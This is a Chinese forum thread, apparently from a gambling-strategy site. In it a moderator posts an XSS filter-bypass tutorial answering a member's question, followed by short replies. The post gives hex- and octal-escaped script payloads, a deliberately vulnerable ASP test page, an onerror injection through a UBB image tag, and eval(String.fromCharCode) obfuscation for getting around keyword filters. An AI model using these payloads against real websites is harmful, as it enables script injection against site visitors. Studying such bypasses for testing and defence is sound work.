博路发

 找回密码
 立即注册
博路发
123123
查看: 4369|回复: 37
打印 上一主题 下一主题

解答会员提问的XSS使用以及转码的视频教程

[复制链接]

926

主题

1759

帖子

3111

积分

超级版主

Rank: 8Rank: 8

积分
3111
跳转到指定楼层
楼主
发表于 2018-8-14 11:53:05 | 只看该作者 |只看大图 回帖奖励 |正序浏览 |阅读模式
本帖最后由 bete68.com 于 2018-8-14 12:13 编辑

首先感谢录制本次视频教程的某小组技术人员,本次解答内容是因为论坛一个叫xiaozai的会员提问XSS如何过滤,以及http://www.bete68.com/thread-6165-1-1.html这篇文章的综合回答,虽然已经超出了论坛回答范围了,但是博路发论坛本着有问必答的态度邀请了某技术论坛里的人员进行本次视频的录制,视频教程地址在文章末尾,提醒一下这位会员,博路发是一个菠菜策略综合论坛,以后尽量别提问这种编外话题,提问了又不能不解答,好为难客服妹子吆

言归正传,这篇文章一定要好好看,然后再看视频教程
很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,最常见的就是对<>转换成<以及>,经过转换以后<>虽然可在正确显示在页面上,但是已经不能构成代码语句了。这个貌似很彻底,因为一旦<>被转换掉,什么<script src=1.js></script>就会转换成“<script src=1.js></script>”,不能执行,因此,很多人认为只要用户的输入没有构成<>,就不能闭合前后的标签,其语句当然也不会有害。
但是,万事总有可能,只要有一定的条件,我们就可以构造经过编码后的语句来进行XSS。
1转义字符
首先要认识一下“\”,这个不是斜杠么。对的,斜杠在JAVASCRIPT有着特殊的用途,它是转义的符号。例如,我们把我们XSS语句转换成16进制,这里是<script>alert(‘poruin’)</script>,我用在CHA88那里淘过来的脚本工具来转换,
解答会员提问的XSS使用以及转码的视频教程
结果如下
\x3C\x73\x63\x72\x69\x70\x74\x3E\x61\x6C\x65\x72\x74\x28\x27\x70\x6F\x72\x75\x69\x6E\x27\x29\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E
这些就是经过编码后的字符,因为前面的斜杠缘故,所以后面的这些字符在JAVASCRIPT中都会被还原。
我们再来看一下测试用的index.asp
<form name=form>
<input type=text name=text1>
<input type=submit name=submit>
</form>
<%
if request("text1")<> "" then
a=replace(replace(request("text1"),"<","<"),">",">")
end if
%>
<script>
a="<%=a%>"
document.write(a)
</script>
很简单的内容,接受用户的数据后过滤<>,再用JAVASCRIPT显示出来,直接输入XSS的测试语句看看,被转换掉了吧。再来输入经过16进制转换后的字符,这些字符都可以轻松的逃过过滤,完整进入代码中,经过JAVASCRIPT还原之后,正确解释出来。
而不但是十六进制可以,八进制同样奏效,转换后代码如下:
\74\163\143\162\151\160\164\76\141\154\145\162\164\50\47\160\157\162\165\151\156\47\51\74\57\163\143\162\151\160\164\76
二.UBB标签
UBB标签是目前广泛运用到论坛,留言簿,以及其他网站系统的一种编码标签,用户在中间输入地址后即可,在发表的时候系统会自动改成<img src=”url”></img>。这个URL就是用户输入的图片地址,XSS攻击中,可以利用这个特点来达到无需用户输入<>就能执行由用户所输入的代码,我们只要在输入网址的地方输入:
x"/**/onerror="alert('poruin')
那么经过转换后就变成了
<img src="x"/**/onerror="alert('poruin')"></img>
在JS中空格可以用/**/转换
三.JS还原函数
JS中的编码还原函数最常用的就是String.fromCharCode了,这个函数用于ascii码的还原,一般来说,这个函数都要配合EVAL来使用才有效果。
在跨站中,String.fromCharCode主要是使到一些已经被列入黑名单的关键字或语句安全通过检测,把关键字或语句转换成为ASCII码,然后再用String.fromCharCode还原,因为大多数的过滤系统都不会把String.fromCharCode加以过滤,例如关键字alert被过滤掉,那就可以这么利用:
<img src="x"/**/onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,112,111,114,117,105,110,39,41))"></img>
执行效果如上图一样,没有关键字同样执行想要执行的代码。


本次视频教程链接,回复可见:
游客,如果您要查看本帖隐藏内容请回复




上一篇:xss如果过滤符号?
下一篇:从年收入20万 输 到一无所有,刷 到月入3万 又输到 偷 渡美国打黑工!
回复

使用道具 举报

2

主题

569

帖子

569

积分

高级会员

Rank: 4

积分
569
38#
发表于 2022-8-8 13:58:56 | 只看该作者
值得看一下的样子

回复 支持 反对

使用道具 举报

2

主题

507

帖子

628

积分

高级会员

Rank: 4

积分
628
37#
发表于 2021-11-25 12:39:00 | 只看该作者
虽然不懂,但支持

回复 支持 反对

使用道具 举报

0

主题

25

帖子

553

积分

高级会员

Rank: 4

积分
553
36#
发表于 2021-11-14 02:07:06 | 只看该作者
牛逼

回复

使用道具 举报

1

主题

2111

帖子

2108

积分

金牌会员

Rank: 6Rank: 6

积分
2108
35#
发表于 2021-8-20 07:31:44 | 只看该作者
这么好的,真好

回复 支持 反对

使用道具 举报

0

主题

560

帖子

1102

积分

金牌会员

Rank: 6Rank: 6

积分
1102
34#
发表于 2020-6-16 10:18:57 | 只看该作者
回帖是种美德

回复 支持 反对

使用道具 举报

1

主题

2111

帖子

2108

积分

金牌会员

Rank: 6Rank: 6

积分
2108
33#
发表于 2020-6-4 14:24:10 | 只看该作者
键字同样执行想要执行的代码

回复 支持 反对

使用道具 举报

1

主题

256

帖子

265

积分

中级会员

Rank: 3Rank: 3

积分
265
32#
发表于 2020-5-28 09:59:35 | 只看该作者
XSS使用以及转码的视频教程

回复 支持 反对

使用道具 举报

1

主题

211

帖子

216

积分

中级会员

Rank: 3Rank: 3

积分
216
31#
发表于 2020-4-21 10:27:41 | 只看该作者
你们都是高手

回复 支持 反对

使用道具 举报

0

主题

34

帖子

34

积分

新手上路

Rank: 1

积分
34
30#
发表于 2019-7-7 23:31:15 | 只看该作者
感谢博主分享,学习了

回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|博路发 ( 菲律宾ICP备73292958号-1

GMT+8, 2024-5-4 07:21 , Processed in 0.187169 second(s), 31 queries .

Powered by 博路发Copyright @ 2010-2015

快速回复 返回顶部 返回列表